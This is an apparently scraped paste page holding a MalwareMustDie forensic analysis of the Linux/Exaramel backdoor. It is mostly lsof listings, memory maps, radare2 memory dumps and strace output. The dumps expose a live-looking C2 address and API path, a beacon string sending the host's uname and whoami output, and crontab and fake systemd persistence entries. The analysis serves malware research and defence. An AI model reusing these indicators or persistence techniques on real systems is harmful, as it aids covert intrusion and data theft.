<li class="li1"><div class="de1">c41fff8000<span class="sy0">-</span>c420100000 rw<span class="sy0">-</span>p <span class="nu0">00000000</span> <span class="nu0">00</span><span class="sy0">:</span><span class="nu0">00</span> <span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">7f32836ed000<span class="sy0">-</span>7f328378d000 rw<span class="sy0">-</span>p <span class="nu0">00000000</span> <span class="nu0">00</span><span class="sy0">:</span><span class="nu0">00</span> <span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">7fff6fc00000<span class="sy0">-</span>7fff6fc21000 rw<span class="sy0">-</span>p <span class="nu0">00000000</span> <span class="nu0">00</span><span class="sy0">:</span><span class="nu0">00</span> <span class="nu0">0</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="br0">&#91;</span>stack<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">7fff6fdb9000<span class="sy0">-</span>7fff6fdba000 r<span class="sy0">-</span>xp <span class="nu0">00000000</span> <span class="nu0">00</span><span class="sy0">:</span><span class="nu0">00</span> <span class="nu0">0</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="br0">&#91;</span>vdso<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">ffffffffff600000<span class="sy0">-</span>ffffffffff601000 r<span class="sy0">-</span>xp <span class="nu0">00000000</span> <span class="nu0">00</span><span class="sy0">:</span><span class="nu0">00</span> <span class="nu0">0</span> &nbsp;<span class="br0">&#91;</span>vsyscall<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;cwd &nbsp; &nbsp;DIR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp; &nbsp; <span class="nu0">4096</span> &nbsp;<span class="nu0">397369</span> <span class="sy0">/</span>test</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;rtd &nbsp; &nbsp;DIR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp; &nbsp; <span class="nu0">4096</span> &nbsp; &nbsp; &nbsp; <span class="nu0">2</span> <span class="sy0">/</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;txt &nbsp; &nbsp;REG &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp;<span class="nu0">6469139</span> &nbsp;<span class="nu0">397381</span> <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;0u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;1u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;2u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;3u &nbsp;unix <span class="nu0">0xffff88000f2c6480</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">6334</span> <span class="sy0">/</span>tmp<span class="sy0">/.</span>applock</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;4u &nbsp;<span class="nu0">0000</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span><span class="sy0">,</span><span class="nu0">9</span> &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span> &nbsp; &nbsp;<span class="nu0">1203</span> anon_inode</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;5r &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">1</span><span class="sy0">,</span><span class="nu0">9</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">1210</span> <span class="sy0">/</span>dev<span class="sy0">/</span>urandom</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;6r &nbsp;FIFO &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span><span class="sy0">,</span><span class="nu0">8</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">6350</span> pipe</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;8r &nbsp;FIFO &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span><span class="sy0">,</span><span class="nu0">8</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">6351</span> pipe</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;cwd &nbsp; &nbsp;DIR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp; &nbsp; <span class="nu0">4096</span> &nbsp;<span class="nu0">397369</span> <span class="sy0">/</span>test</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;rtd &nbsp; &nbsp;DIR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp; &nbsp; <span class="nu0">4096</span> &nbsp; &nbsp; &nbsp; <span class="nu0">2</span> <span class="sy0">/</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;txt &nbsp; &nbsp;REG &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp;<span class="nu0">6469139</span> &nbsp;<span class="nu0">397381</span> <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;0u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;1u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;2u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;3u &nbsp;unix <span class="nu0">0xffff88000f2c6480</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">6334</span> <span class="sy0">/</span>tmp<span class="sy0">/.</span>applock</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;4u &nbsp;<span class="nu0">0000</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span><span class="sy0">,</span><span class="nu0">9</span> &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span> &nbsp; &nbsp;<span class="nu0">1203</span> anon_inode</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;5r &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">1</span><span class="sy0">,</span><span class="nu0">9</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">1210</span> <span class="sy0">/</span>dev<span class="sy0">/</span>urandom</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;6r &nbsp;IPv4 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">6424</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; TCP $LOCAL<span class="sy0">:</span><span class="nu0">34573</span><span class="sy0">-&gt;</span>176<span class="sy0">.</span>31<span class="sy0">.</span>225<span class="sy0">.</span>204<span class="sy0">:</span><span class="nu0">443</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;cwd &nbsp; &nbsp;DIR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp; &nbsp; <span class="nu0">4096</span> &nbsp;<span class="nu0">397369</span> <span class="sy0">/</span>test</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;rtd &nbsp; &nbsp;DIR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp; &nbsp; <span class="nu0">4096</span> &nbsp; &nbsp; &nbsp; <span class="nu0">2</span> <span class="sy0">/</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;txt &nbsp; &nbsp;REG &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp;<span class="nu0">6469139</span> &nbsp;<span class="nu0">397381</span> <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;0u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;1u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;2u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;3u &nbsp;unix <span class="nu0">0xffff88000f2c6480</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">6334</span> <span class="sy0">/</span>tmp<span class="sy0">/.</span>applock</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;4u &nbsp;<span class="nu0">0000</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span><span class="sy0">,</span><span class="nu0">9</span> &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span> &nbsp; &nbsp;<span class="nu0">1203</span> anon_inode</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;5r &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">1</span><span class="sy0">,</span><span class="nu0">9</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">1210</span> <span class="sy0">/</span>dev<span class="sy0">/</span>urandom</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> Live radare2 forensics <span class="br0">&#40;</span>before<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a6440</span> <span class="nu0">2304</span> <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel<span class="br0">&#93;</span><span class="sy0">&gt;</span> pxx @ obj<span class="sy0">.</span>runtime<span class="sy0">.</span>enoptrbss<span class="sy0">+</span><span class="nu0">528867392</span> <span class="sy0">#</span> <span class="nu0">0xc4200a6440</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">-</span> offset <span class="sy0">-</span> &nbsp; &nbsp; 0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a6440</span> &nbsp;Access<span class="sy0">-</span>Control<span class="sy0">-</span>Allow<span class="sy0">-</span>Origin<span class="sy0">.....</span>Content<span class="sy0">-</span>Disposition<span class="sy0">.............</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a6480</span> &nbsp;If<span class="sy0">-</span>Unmodified<span class="sy0">-</span>Since<span class="sy0">.............</span>Proxy<span class="sy0">-</span>Authenticate<span class="sy0">..............</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a64c0</span> &nbsp;Proxy<span class="sy0">-</span>Authorization<span class="sy0">.............</span>Strict<span class="sy0">-</span>Transport<span class="sy0">-</span>Security<span class="sy0">.......</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a6500</span> &nbsp;Transfer<span class="sy0">-</span>Encoding<span class="sy0">...............</span>config<span class="sy0">.</span>json<span class="sy0">.....................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a6540</span> &nbsp;<span class="sy0">..</span>m<span class="sy0">...............</span>m<span class="sy0">...............</span>m<span class="sy0">.....................</span>`<span class="sy0">..</span> <span class="sy0">....</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a6580</span> &nbsp;listen unix <span class="sy0">/</span>tmp<span class="sy0">/.</span>applock<span class="sy0">.......</span>bind<span class="sy0">:</span> address already <span class="kw2">in</span> use<span class="sy0">....</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a65c0</span> &nbsp;App has already started!<span class="sy0">.......................................</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> Live radare2 forensics <span class="br0">&#40;</span>after<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000ed90</span> &nbsp;Authorization<span class="sy0">...</span>Content<span class="sy0">-</span>EncodingContent<span class="sy0">-</span>LocationContent<span class="sy0">-</span>Range<span class="sy0">...</span>Expect<span class="sy0">..</span>If<span class="sy0">-</span>MatchLinkMax<span class="sy0">-</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000ede8</span> &nbsp;ForwardsRangeReferer<span class="sy0">....</span>RefreshTrailer<span class="sy0">..</span>Retry<span class="sy0">-</span>After<span class="sy0">.....</span>Vary100101102200Www<span class="sy0">-</span>Authenticate</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000ee40</span> &nbsp;201202203204205<span class="sy0">.</span>206207208226300<span class="sy0">.</span>301302303304305<span class="sy0">.</span>307308400401402<span class="sy0">.</span>403404405406407<span class="sy0">.</span>40840941</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000ee98</span> &nbsp;0411412<span class="sy0">.</span>413414415416417<span class="sy0">.</span>418422423424426<span class="sy0">.</span>428429431451500<span class="sy0">.</span>501502503504505<span class="sy0">.</span>506507508510511<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000eef0</span> &nbsp;$<span class="sy0">.</span>m<span class="sy0">.............</span>j6n<span class="sy0">.....</span>&amp;<span class="sy0">.........</span>m<span class="sy0">..............</span>!n<span class="sy0">..............</span>bn<span class="sy0">.....</span><span class="nu0">4</span><span class="sy0">.........</span>m<span class="sy0">.....</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000ef48</span> &nbsp;<span class="sy0">......../</span>test<span class="sy0">/</span>`<span class="sy0">........</span> E<span class="sy0">.</span> <span class="sy0">..../</span>tmp<span class="sy0">/.</span>applock<span class="sy0">............................................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000efa0</span> &nbsp;rH<span class="sy0">..*.</span>E?<span class="sy0">.</span><span class="br0">&#91;</span><span class="sy0">......</span>&amp;<span class="sy0">.............../</span>dev<span class="sy0">/</span>urandom<span class="sy0">............</span>@<span class="sy0">..</span> <span class="sy0">............................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000eff8</span> &nbsp;<span class="sy0">................................</span>Hosts<span class="sy0">...................</span>Proxy<span class="sy0">...................</span>Version<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f050</span> &nbsp;<span class="sy0">................</span>Guid<span class="sy0">....................</span>Next<span class="sy0">....................</span>Datetime<span class="sy0">................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f0a8</span> &nbsp;Timeout<span class="sy0">.................</span>Def<span class="sy0">.............................................................</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f408</span> &nbsp;<span class="sy0">/</span>bin<span class="sy0">/</span>sh<span class="sy0">................./</span>bin<span class="sy0">/</span>sh<span class="sy0">.-</span>c<span class="sy0">......</span>SHELL<span class="sy0">=/</span>bin<span class="sy0">/</span>bash<span class="sy0">.</span>TERM<span class="sy0">=</span>vt100<span class="sy0">......</span>HUSHLOGIN<span class="sy0">=</span>FALSE<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f460</span> &nbsp;USER<span class="sy0">=</span>nyan_apt<span class="sy0">....</span>SHLVL<span class="sy0">=</span><span class="nu0">1</span><span class="sy0">.........</span>HOME<span class="sy0">=/</span>test<span class="sy0">.</span>LOGNAME<span class="sy0">=</span>test<span class="sy0">.......</span>_<span class="sy0">=./</span>Exaramel<span class="sy0">...</span><span class="nu0">1</span><span class="sy0">.</span>m<span class="sy0">.......</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f4b8</span> &nbsp;<span class="sy0">........</span>`<span class="sy0">..........</span> <span class="sy0">....</span>`<span class="sy0">..........</span> <span class="sy0">..../</span>dev<span class="sy0">/</span>null<span class="sy0">..........</span> <span class="sy0">.......</span> <span class="sy0">....................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f510</span> &nbsp;<span class="sy0">/</span>bin<span class="sy0">/</span>sh<span class="sy0">./</span>bin<span class="sy0">/</span>sh<span class="sy0">.-</span>c<span class="sy0">.</span>whoami<span class="sy0">.......</span>SHELL<span class="sy0">=/</span>bin<span class="sy0">/</span>bash<span class="sy0">.</span>TERM<span class="sy0">=</span>vt100<span class="sy0">......</span>HUSHLOGIN<span class="sy0">=</span>FALSE<span class="sy0">.</span>USER<span class="sy0">=</span>nyan</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f568</span> &nbsp;_apt<span class="sy0">.....</span>SHLVL<span class="sy0">=</span><span class="nu0">1</span><span class="sy0">.</span>mung<span class="sy0">....</span>HOME<span class="sy0">=/</span>test<span class="sy0">..</span>LOGNAME<span class="sy0">=</span>test<span class="sy0">....</span>_<span class="sy0">=./</span>Exaramel<span class="sy0">........</span>test<span class="sy0">../</span>bin<span class="sy0">/</span>uname</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f5c0</span> &nbsp;`<span class="sy0">.</span>m<span class="sy0">............./</span>usr<span class="sy0">/</span>bin<span class="sy0">/</span>uname<span class="sy0">../</span>usr<span class="sy0">/</span>bin<span class="sy0">/</span>uname<span class="sy0">../</span>bin<span class="sy0">/</span>uname<span class="sy0">......</span>`<span class="sy0">..........</span> <span class="sy0">....</span>`<span class="sy0">.......</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f618</span> &nbsp;<span class="sy0">...</span> <span class="sy0">..../</span>dev<span class="sy0">/</span>null<span class="sy0">..........</span> <span class="sy0">.......</span> <span class="sy0">............</span>uname<span class="sy0">.................../</span>bin<span class="sy0">/</span>uname<span class="sy0">......</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f670</span> &nbsp;<span class="sy0">-</span>a<span class="sy0">.</span>TERM<span class="sy0">=</span>vt100<span class="sy0">...</span>SHELL<span class="sy0">=/</span>bin<span class="sy0">/</span>bash<span class="sy0">.</span>HUSHLOGIN<span class="sy0">=</span>FALSE<span class="sy0">.</span>USER<span class="sy0">=</span>test<span class="sy0">....</span>SHLVL<span class="sy0">=</span><span class="nu0">1</span><span class="sy0">.</span>nyan_apt<span class="sy0">%</span>0A<span class="sy0">.</span>HOME<span class="sy0">=/</span>te</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f6c8</span> &nbsp;st<span class="sy0">.</span>LOGNAME<span class="sy0">=</span>test<span class="sy0">....</span>_<span class="sy0">=./</span>Exaramel<span class="sy0">..........</span>`<span class="sy0">.....</span>@<span class="sy0">..</span> <span class="sy0">.......</span> <span class="sy0">....</span>$<span class="sy0">..........</span> <span class="sy0">.............</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f720</span> &nbsp;P<span class="sy0">..</span> <span class="sy0">....</span>I<span class="sy0">.........</span>m<span class="sy0">...............</span>m<span class="sy0">...........</span>nyan_apt<span class="sy0">%</span>0A<span class="sy0">...............................</span></div></li>
<li class="li1"><div class="de1">&nbsp; <span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42004a36f</span> &nbsp;<span class="sy0">.*/</span><span class="nu0">1</span> <span class="sy0">*</span> <span class="sy0">*</span> <span class="sy0">*</span> <span class="sy0">*</span> <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel<span class="sy0">.</span>@reboot <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel<span class="sy0">.</span><span class="kw4">true</span><span class="sy0">.................................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42004a4cf</span> &nbsp;<span class="sy0">..</span>`<span class="sy0">.</span> <span class="sy0">............................................</span>Linux xxxxxxxxxxxxxxxxxxxxxxxxxx <span class="sy0">#</span><span class="nu0">1</span> SMP</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42004a527</span> &nbsp; xxxxxxxxxxxxxxxxxxxxxx GNU<span class="sy0">/</span>Linux<span class="sy0">.......................................................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42004c660</span> &nbsp;<span class="br0">&#40;</span>crontab <span class="sy0">-</span>l <span class="nu0">2</span><span class="sy0">&gt;/</span>dev<span class="sy0">/</span>null<span class="br0">&#41;</span> | grep <span class="sy0">//</span>test<span class="sy0">/</span>Exaramel &amp;&amp; echo <span class="st0">'true'</span> || echo <span class="st0">'false'</span><span class="sy0">.........</span></div></li>
<li class="li1"><div class="de1">&nbsp; <span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc420053148</span> &nbsp;<span class="sy0">........................................................................................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200531a0</span> &nbsp;<span class="sy0">/</span>etc<span class="sy0">/</span>systemd<span class="sy0">/</span>system<span class="sy0">/</span>syslogd<span class="sy0">.</span>service<span class="sy0">.....................................................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200531f8</span> &nbsp;<span class="sy0">........................................................................................</span></div></li>
<li class="li1"><div class="de1">&nbsp; <span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200533d3</span> &nbsp;<span class="sy0">........................................................................................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42005342b</span> &nbsp;<span class="sy0">.....................</span>https<span class="sy0">://</span>176<span class="sy0">.</span>31<span class="sy0">.</span>225<span class="sy0">.</span>204<span class="sy0">/</span>api<span class="sy0">/</span>v1<span class="sy0">/</span>auth<span class="sy0">/</span>app<span class="sy0">.............................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc420053483</span> &nbsp; <span class="sy0">.............................</span>q`<span class="sy0">........</span> <span class="sy0">...............................................</span></div></li>
<li class="li1"><div class="de1">&nbsp; <span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200551e0</span> &nbsp;generation<span class="sy0">=</span><span class="nu0">1</span>&amp;guid<span class="sy0">=</span>7248d60f<span class="sy0">-</span>2a8f<span class="sy0">-</span><span class="nu0">453f</span><span class="sy0">-</span>ac5b<span class="sy0">-</span>19f5e0d7a3b0&amp;platform<span class="sy0">=</span>Linux<span class="sy0">+</span>xxxxxxxxxxxxxxxxx</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc420055238</span> &nbsp;xxxxxxx<span class="sy0">+%</span><span class="nu0">231</span><span class="sy0">+</span>SMP<span class="sy0">+</span>xxxxxxxxxxxxxx<span class="sy0">+</span>x86_64<span class="sy0">+</span>GNU<span class="sy0">%</span>2FLinux<span class="sy0">%</span>0A&amp;version<span class="sy0">=</span><span class="nu0">1</span>&amp;whoami<span class="sy0">=</span>nyan_apt<span class="sy0">%</span>0A<span class="sy0">.....</span> </div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> crontab tampering artifact</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">munmap<span class="br0">&#40;</span><span class="nu0">0x7f75952fb000</span><span class="sy0">,</span> <span class="nu0">4096</span><span class="br0">&#41;</span> &nbsp; &nbsp; &nbsp;<span class="sy0">=</span> <span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">socket<span class="br0">&#40;</span>PF_FILE<span class="sy0">,</span> SOCK_DGRAM|SOCK_CLOEXEC<span class="sy0">,</span> <span class="nu0">0</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">3</span></div></li>
<li class="li1"><div class="de1">connect<span class="br0">&#40;</span><span class="nu0">3</span><span class="sy0">,</span> <span class="br0">&#123;</span>sa_family<span class="sy0">=</span>AF_FILE<span class="sy0">,</span> path<span class="sy0">=</span><span class="st0">&quot;/dev/log&quot;</span><span class="br0">&#125;</span><span class="sy0">,</span> <span class="nu0">110</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">sendto<span class="br0">&#40;</span><span class="nu0">3</span><span class="sy0">,</span> <span class="st0">&quot;&lt;78&gt;Jan 10 07:55:51 crontab[2547]: (test) LIST (test)&quot;</span><span class="sy0">,</span> <span class="nu0">53</span><span class="sy0">,</span> MSG_NOSIGNAL<span class="sy0">,</span> NULL<span class="sy0">,</span> <span class="nu0">0</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">53</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="co1">---</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">#</span> MalwareMustDie! <span class="sy0">-</span> Don<span class="st0">'t spread malware - spread LOVE! @unixfreaxjp</span></div></li>
</ol>        </div>
    </div>

    
                

        <div class="content__title -no-border">
            RAW Paste Data        </div>

        <textarea class="textarea">// Linux/Exaramel (BlackEnergy) - APT ELF malware
// ref: https://www.virustotal.com/gui/file/c39b4105e1b9da1a9cccb1dace730b1c146496c591ce0927fb035d48e9cb5c0f/details
// binary forms (go-lang with &quot;vendor&quot; installation)
// quick analysis by @unixfreaxjp on radare2 &amp; tsurugi linux seccon
// *) on going stuff is happening, the contents can be changed. #MalwareMustDie! 

###############################
# Summary                     #
